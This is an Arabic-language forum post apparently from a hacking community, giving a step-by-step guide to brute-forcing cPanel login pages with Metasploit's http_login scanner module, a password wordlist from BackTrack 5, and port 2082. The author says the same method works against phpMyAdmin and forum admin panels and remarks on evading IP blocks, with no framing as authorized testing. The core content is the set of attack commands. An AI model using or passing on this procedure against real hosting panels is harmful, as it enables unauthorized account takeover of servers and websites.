حالة الموضوع:
مغلق
  1. al-swisre

    al-swisre DeveloPer Plus

    الأنتساب:
    ‏17 مايو 2011
    المشاركات:
    22
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    3
    الوظيفة:
    كيف الحال ؟
    الإقامة:
    .:: Al-Qassim ::.
    السلام عليكم ورحمة الله وبركاته

    اخباركم انشاء الله بخير

    طلب مني بعض الشباب طريقة لتخمين السي بنل على الميتاسبولت

    واليوم اشرح لكم الطريقة لتخمين على السي بنل

    لأول مرة تشرح الطريقة في المواقع والمنتديات العربية

    وايضا لاتنحصر على السي بنل بل اي جدار لدخول

    مثل جدار الموجود في لوحة تحكم المنتديات

    فيه جدار ناري وفيه جدار عادي مثل السي بنل

    اهم شئ يكون فيه جدار لنعمل هذا الهجوم

    قد تقوم بعض السيرفرات بحضر الاي بي تبعك

    او تقوم بعض السي بنلات بمنع التخمين كم في اغلب اصدار 2011

    تختلف عوائق التخمين

    الي يحتاج ورد لسته باسوردات قوية :{13}:

    موجودة على هذا المسار في الباك تراك 5

    /pentest/passwords/wordlist/

    darkc0de.lst

    نشوف الشرح

    [​IMG]


    اوامر الشرح بعد تشغيل الميتا



    use auxiliary/scanner/http/http_login

    set PASS_FILE /home/darkc0de.lst

    set USERPASS_FILE /home/user.txt

    RHOSTS 127.0.0.1

    set RPORT 2082

    set VERBOSE false

    run


    تستطيع ايضا تخمين phpmyadmin في الويندوز بنفس هذه الطريقة

    وهذا شرح فيديو لتخمين على لوحة مشابه لـ phpmyadmin بأمكانك تطبيق نفس الخطوات

    من هنا bruteforce_http_login_metasploit.avi on Vimeo
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة